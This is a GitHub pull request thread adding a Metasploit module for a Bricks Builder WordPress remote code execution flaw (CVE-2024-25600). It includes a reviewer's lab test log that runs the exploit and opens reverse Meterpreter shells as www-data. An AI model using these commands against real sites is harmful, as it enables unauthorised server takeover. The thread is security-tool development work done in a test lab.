Add wp_bricks_builder_rce (CVE-2024-25600) #18891
Hello, I wanted to know about the "Sanity Test Execution", since the changes in my code, it no longer validates this test. I would like some help on this, thank you. EDIT: Just a bug
I think the change seems pretty legit, thanks! 👍 I think
Hello @jheysel-r7 Any news about the module? Thanks 🙂
Thanks for the great module @Chocapikk! I've left a couple minor suggestions. Testing was as expected:
ARCH_PHP

```
msf6 exploit(multi/http/wp_bricks_builder_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8000
rport => 8000
msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (39927 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56073) at 2024-03-26 12:05:11 -0700
[*] Sending stage (39927 bytes) to 172.16.199.72
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 29292f368fe3
OS : Linux 29292f368fe3 6.6.16-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Feb 16 11:55:08 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >exit
```

ARCH_CMD

```
msf6 exploit(multi/http/wp_bricks_builder_rce) > set target 2
target => 2
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:8000
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 3 opened (172.16.199.1:8000 -> 172.16.199.1:56169) at 2024-03-26 12:08:17 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.22.0.3
OS : Debian 12.5 (Linux 6.6.16-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Hello @jheysel-r7, I don't think I need to make any changes except to add your suggestions and fix the typos, tested on my lab and it's good too. Thanks for the changes and the explanations as well!
abb2eb7
Release Notes
This PR adds an exploit module that targets a known vulnerability, CVE-2024-25600, in the WordPress Bricks Builder Theme, versions prior to 1.9.6.
This pull request introduces the `wp_bricks_builder_rce` exploit module that targets a known vulnerability in the Bricks Builder plugin for WordPress. The module has been developed following the best practices outlined in the Metasploit Framework documentation and has been thoroughly tested to ensure reliability and effectiveness. Comprehensive documentation has been included to facilitate understanding and usage of the module by other security professionals and developers.
I believe this module will be a valuable addition to the Metasploit Framework and look forward to any feedback or suggestions for improvement.
Best regards,
Chocapikk